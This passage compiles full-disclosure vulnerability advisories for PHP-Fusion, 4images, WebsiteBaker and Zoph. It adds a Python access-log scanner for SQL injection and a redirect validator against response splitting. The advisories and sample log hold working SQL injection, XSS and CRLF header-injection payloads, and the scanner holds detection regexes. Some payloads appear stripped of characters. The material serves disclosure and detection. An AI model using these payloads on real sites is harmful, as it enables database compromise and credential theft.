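10.0.0.5 - - [11/Jul/2017:10:01:03 +0000] "GET /theocms/core/admin.php?cat=0 HTTP/1.0" 200 512
10.0.0.7 - - [06/Apr/2017:12:00:00 +0000] "POST /wordpress/wp-admin/admin.php?page=SpiderCalendar HTTP/1.0" 200 9831 order_by=id%2c(select*from(select(sleep(2)))a)
10.0.0.9 - - [18/Sep/2015:09:00:00 +0000] "GET /phpfusion/files/administration/members.php?status=0'+AND+substr(@@version,1,1)='5 HTTP/1.0" 200 4200
10.0.0.9 - - [18/Sep/2015:09:00:01 +0000] "GET /phpfusion/files/administration/members.php?status=0'+AND+substr(@@version,1,1)='4 HTTP/1.0" 200 4100
10.0.0.3 - - [18/Sep/2015:09:05:00 +0000] "GET /phpfusion/files/administration/members.php?status=0 HTTP/1.0" 200 4200
"""

# Combined-log-style line; the optional trailing field carries a request body.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: (?P<body>\S+))?$'
)

# Indicator families taken from the PoCs above. Matching runs on the
# URL-decoded text so %2c, '+' and similar encodings cannot hide the keywords.
RULES = {
    "union_based": re.compile(r"union\s+(all\s+)?select|@@(version|hostname)", re.I),
    "time_based": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "boolean_based": re.compile(r"'\s*(and|or)\s+.+=", re.I),
}


def parse_line(line: str) -> Dict[str, Optional[str]]:
    m = LOG_RE.match(line)
    if m is None:
        raise ValueError(f"unparseable log line: {line!r}")
    return m.groupdict()


def classify(target: str, body: Optional[str]) -> List[str]:
    """Return the indicator families present in the decoded target and body."""
    haystack = unquote_plus(target) + " " + unquote_plus(body or "")
    return [name for name, rx in RULES.items() if rx.search(haystack)]


def scan(log_text: str) -> List[Dict[str, object]]:
    """One hit record per tagged request: source IP, path, indicator tags."""
    hits: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        target = rec["target"] or ""
        tags = classify(target, rec.get("body"))
        if tags:
            hits.append({"ip": rec["ip"], "path": target.split("?", 1)[0], "tags": tags})
    return hits


def suspicious_sources(hits: List[Dict[str, object]], threshold: int = 2) -> Dict[str, int]:
    """Sources with at least `threshold` tagged requests (assumed tuning value)."""
    counts: Dict[str, int] = {}
    for h in hits:
        ip = str(h["ip"])
        counts[ip] = counts.get(ip, 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for hit in found:
        print(hit)
    print(suspicious_sources(found))
```

Two practical points the sample makes visible: the time-based probe is only detectable here because the body was logged, so a plain access log would miss the Spider Event Calendar shape entirely; and the boolean-based pair from 10.0.0.9 is two near-identical requests seconds apart, which is why per-source counting matters more than any single-line rule for that class.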

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
PHP-Fusion <= v7.02.07

VII. SOLUTION
-
All data received by the application that can be modified by the user must
be validated before any kind of transaction is made with it.

VIII. REFERENCES
-
https://www.php-fusion.co.uk/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
September 18, 2015 1: Initial release
October 10, 2015 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
September 18, 2015 1: Vulnerability acquired by Manuel Garcia Cardenas
September 18, 2015 2: Send to vendor
September 24, 2015 3: Second mail to the vendor without response
October 10, 2015 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester


[FD] Stored XSS in 4images <= v1.7.11

2015-09-25 Thread Manuel Garcia Cardenas
=
MGC ALERT 2015-001
- Original release date: September 08, 2015
- Last revised:  September 24, 2015
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,8/10 (CVSS Base Score)
=

I. VULNERABILITY
-
Stored XSS in 4images <= v1.7.11

II. BACKGROUND
-
4images is a powerful web-based image gallery management system. Features
include comment system, user registration and management, password
protected administration area with browser-based upload and HTML templates
for page layout and design.

III. DESCRIPTION
-
A stored XSS vulnerability has been detected in 4images that allows
arbitrary HTML/script code to be executed in the context of the victim
user's browser.

The code injection is done through the parameter "cat_description" on the
page categories.php.

IV. PROOF OF CONCEPT
-
Malicious Request:
http://vulnerablesite.com/4images/admin/categories.php
__csrf==updatecat_id=1_name=example_description=_parent_id=0_order=5_hits=2285_viewcat=0_viewimage=0_download=2_upload=2_directupload=9_vote=0_sendpostcard=0_readcomment=0_postcomment=2

Example:
http://vulnerablesite.com/4images/categories.php?cat_id=1

V. BUSINESS IMPACT
-
An attacker can execute arbitrary HTML or script code in a targeted user's
browser, this can leverage to steal sensitive information as user
credentials, personal data, etc.

VI. SYSTEMS AFFECTED
-
4images <= v1.7.11

VII. SOLUTION
-
Update to the latest version.

VIII. REFERENCES
-
http://www.4homepages.de/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
September 08, 2015 1: Initial release
September 24, 2015 2: Last revision

XI. DISCLOSURE TIMELINE
-
September 08, 2015 1: Vulnerability acquired by Manuel Garcia Cardenas
September 08, 2015 2: Send to vendor
September 24, 2015 3: Sent to lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester



[FD] WebsiteBaker =2.8.3 - Multiple Vulnerabilities

2014-11-17 Thread Manuel Garcia Cardenas
=
MGC ALERT 2014-004
- Original release date: March 11, 2014
- Last revised:  November 18, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 10/10 (CVSS Base Score)
=

I. VULNERABILITY
-
Multiple Vulnerabilities in WebsiteBaker 2.8.3

II. BACKGROUND
-
WebsiteBaker helps you to create the website you want: A free, easy and
secure, flexible and extensible open source content management system (CMS).

III. DESCRIPTION
-
It is possible to inject SQL code in the variable id on the page
modify.php. This bug was found using the portal without authentication.
To exploit the vulnerability, it is only necessary to use version 1.0 of the
HTTP protocol to interact with the application.

A reflected XSS vulnerability has been detected in WebsiteBaker that allows
arbitrary HTML/script code to be executed in the context of the victim
user's browser.

An input validation problem exists within WebsiteBaker which allows
injecting CR (carriage return - %0D or \r) and LF (line feed - %0A or \n)
characters into the server HTTP response header, resulting in an HTTP
Response Splitting vulnerability.

IV. PROOF OF CONCEPT
-
SQL Injection:

/wb/admin/pages/modify.php?page_id=1

Cross-Site Scripting GET:

/wb/admin/admintools/tool.php?tool=captcha_control6d442scriptalert(1)/script8e3b12642a8=1
/wb/modules/edit_module_files.php?page_id=1mod_dir=newsedit_file=frontend.cssaction=editpage_id=1section_id=%007e393scriptalert(1)/script9f8a40a7355f9acf0
/wb/modules/news/add_post.php?page_id=1section_id=f953ascriptalert(1)/script4ddf3369c1f
/wb/modules/news/modify_group.php?page_id=1section_id=%008cf03scriptalert(1)/script2680504c3ecgroup_id=62be99873b33d1d3
/wb/modules/news/modify_post.php?page_id=1section_id=%003874ascriptalert(1)/script4194d511605post_id=db89943875a2db52
/wb/modules/news/modify_settings.php?page_id=1section_id=%008b2f4scriptalert(1)/scriptbdc8b3919b5

HTTP RESPONSE SPLITTING:

If you enter a valid user and password, you can inject malicious code into
the headers, for example:

POST /wb/admin/login/index.php HTTP/1.1
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.244.129:80/wb/
Host: 127.0.0.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

password_fieldname=password_nwh1uuwbpassword_nwh1uuwb=VALIDPASSremember=truesubmit=Entrar
url=%0d%0a%20InjectedHeader:MaliciousCodeusername_fieldname=username_nwh1uuwbusername_nwh1uuwb=adminResponse

A new header named InjectedHeader:MaliciousCode can be injected because the
value contains a CRLF new line (%0d%0a%20).
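The splitting works because the login handler copies the url field into a response header without checking it for CR/LF. As an added example (not WebsiteBaker code), the Python below is a stand-in for that step, assuming the header in question is a post-login Location redirect: it decodes the value, rejects any control character, and also rejects off-site targets, which the same unchecked field would otherwise allow (an open redirect). The host 127.0.0.1 and the default path /wb/ come from the request shown above; the function and exception names are assumptions.

```python
"""Validate a redirect target before it is written into a response header.

Added example, not WebsiteBaker code. It assumes the login form's `url` field
ends up in a Location header; the host and default path are the ones seen in
the request above.
"""
from urllib.parse import unquote, urlsplit


class UnsafeRedirect(ValueError):
    """Raised when a redirect target must not be emitted."""


def safe_location_header(url_param: str, allowed_host: str = "127.0.0.1",
                         default: str = "/wb/") -> str:
    """Return the 'Location: ...' line for a validated target, else raise."""
    target = unquote(url_param or "") or default
    # Response splitting: a CR/LF (or any control byte) in the value would end
    # the header early and let the remainder be parsed as new headers or a body.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in target):
        raise UnsafeRedirect("control character in redirect target")
    # Browsers normalise backslashes to slashes, so treat them as unsafe too.
    if "\\" in target:
        raise UnsafeRedirect("backslash in redirect target")
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        # Absolute or protocol-relative URL: only our own host over http(s).
        # hostname (not netloc) ignores a port and strips user@ tricks.
        if parts.scheme not in ("http", "https") or parts.hostname != allowed_host:
            raise UnsafeRedirect("redirect leaves the site")
    elif not target.startswith("/"):
        raise UnsafeRedirect("redirect must be a site-relative path")
    return f"Location: {target}"


def is_safe_redirect(url_param: str) -> bool:
    """Boolean wrapper for callers that only want accept/reject."""
    try:
        safe_location_header(url_param)
    except UnsafeRedirect:
        return False
    return True


if __name__ == "__main__":
    for candidate in ("/wb/admin/pages/index.php", "%0d%0a%20InjectedHeader:MaliciousCode"):
        print(repr(candidate), "->", is_safe_redirect(candidate))
```

Most web frameworks already refuse CR/LF in header values, so the first check is a belt-and-braces measure; the same-host check is the part application code still has to supply, because no framework knows which destinations a login redirect is meant to reach.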

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
WebsiteBaker = 2.8.3

VII. SOLUTION
-
No new releases.

VIII. REFERENCES
-
http://www.websitebaker.org

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
March 11, 2014 1: Initial release

XI. DISCLOSURE TIMELINE
-
March 11, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
March 11, 2014 2: Send to vendor
June 05, 2014 3: Second mail to the vendor without response
November 18, 2014 4: Sent to lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied as-is with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester



[FD] Zoph = 0.9.1 - Multiple Vulnerabilities

2014-11-17 Thread Manuel Garcia Cardenas
=
MGC ALERT 2014-005
- Original release date: March 5, 2014
- Last revised:  November 18, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 10/10 (CVSS Base Score)
=

I. VULNERABILITY
-
Multiple Vulnerabilities in Zoph = 0.9.1

II. BACKGROUND
-
Zoph (Zoph Organizes Photos) is a web based digital image presentation and
management system. In other words, a photo album. It is built with PHP,
MySQL and Perl.

III. DESCRIPTION
-
It is possible to inject SQL code in the variables id and action on the
pages group, photos and user. This bug was found using the portal with
authentication. To exploit the vulnerability, it is only necessary to use
version 1.0 of the HTTP protocol to interact with the application.

A reflected XSS vulnerability has been detected in Zoph that allows
arbitrary HTML/script code to be executed in the context of the victim
user's browser.

IV. PROOF OF CONCEPT
-
SQL Injection:

/zoph/php/group.php?_action=1'%22_clear_crumbs=1
/zoph/php/photos.php?location_id=1'%22
/zoph/php/user.php?user_id=_action=1'%22

Cross-Site Scripting GET:

/zoph/php/edit_photos.php?photographer_id=3scriptalert(1)/script
/zoph/php/edit_photos.php?album_id=2_crumb=3scriptalert(1)/script

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
Zoph = 0.9.1

VII. SOLUTION
-
No new releases.

VIII. REFERENCES
-
http://www.zoph.org/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
March 11, 2014 1: Initial release

XI. DISCLOSURE TIMELINE
-
March 5, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
March 5, 2014 2: Send to vendor
June 17, 2014 3: Second mail to the vendor without response
November 18, 2014 4: Sent to lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied as-is with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester
